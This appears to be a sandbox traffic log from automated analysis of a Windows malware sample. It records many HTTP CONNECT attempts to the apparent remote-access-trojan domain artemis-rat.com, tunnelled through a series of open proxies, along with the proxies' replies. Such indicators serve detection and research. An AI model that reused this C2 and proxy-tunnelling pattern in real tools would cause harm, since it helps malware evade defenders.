                                              Mar 11, 2024 08:37:36.284420013 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:46.780741930 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:38:09.054025888 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1332192.168.2.45422843.153.52.1554437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.425921917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1333192.168.2.45423043.153.52.1554437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.427397966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1334192.168.2.45423343.153.52.1554437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.428555965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1335192.168.2.45412347.243.92.19931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.437237024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.747251034 CET38INHTTP/1.1 200 OK
                                              content-length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1336192.168.2.454077117.160.250.130807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.451035023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.077332973 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1337192.168.2.454171203.24.103.131807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.453866959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.608668089 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1338192.168.2.454128186.124.164.213807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.463409901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1339192.168.2.45352720.216.12.19031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.463690996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.553962946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.554150105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.569725990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.663166046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:59.760274887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:11.756889105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:35.819339991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:51.285887957 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1340192.168.2.45416460.188.102.225180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.477314949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1341192.168.2.454151185.217.143.23807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.490159988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1342192.168.2.454132178.115.230.24380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.494658947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.582025051 CET202INHTTP/1.0 403 Forbidden
                                              Content-Length: 487
                                              Content-Type: text/html
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Expires: Mon, 11 Mar 2024 07:37:24 GMT
                                              Server: Mikrotik HttpProxy
                                              Proxy-Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1343192.168.2.453552103.163.244.38827284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.500363111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.554020882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.502280951 CET202INHTTP/1.0 404 Not Found
                                              Content-Length: 718
                                              Content-Type: text/html
                                              Date: Mon, 11 Mar 2024 07:37:29 GMT
                                              Expires: Mon, 11 Mar 2024 07:37:29 GMT
                                              Server: Mikrotik HttpProxy
                                              Proxy-Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1344192.168.2.454139103.42.57.1331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.535124063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.560426950 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1345192.168.2.454303128.199.175.1454437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.536150932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1346192.168.2.45416543.133.74.172156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.536531925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1347192.168.2.45412142.49.148.16790017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.548535109 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:23.924396038 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1348192.168.2.45393164.227.108.25319087284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.570559025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1349192.168.2.454203104.19.233.117807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.577245951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.731636047 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1350192.168.2.453925206.220.175.241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.584213972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1351192.168.2.454205104.21.6.88807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.585025072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.739598036 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1352192.168.2.454212172.67.181.144807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.585603952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.740441084 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1353192.168.2.454322128.199.175.1454437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.586323023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1354192.168.2.454148124.163.236.5473027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.587052107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1355192.168.2.454088117.160.250.16380817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.587068081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.264553070 CET221INHTTP/1.1 403 Access Denied
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Connection: close
                                              Cache-Control: no-store
                                              Content-Type: text/html
                                              Content-Language: en
                                              Content-Length: 43
                                              Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                              Data Ascii: You are not allowed to access the document.


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1356192.168.2.454168125.141.139.6055667284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.592101097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.916532993 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1357192.168.2.454238172.67.14.237807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.592547894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.747185946 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
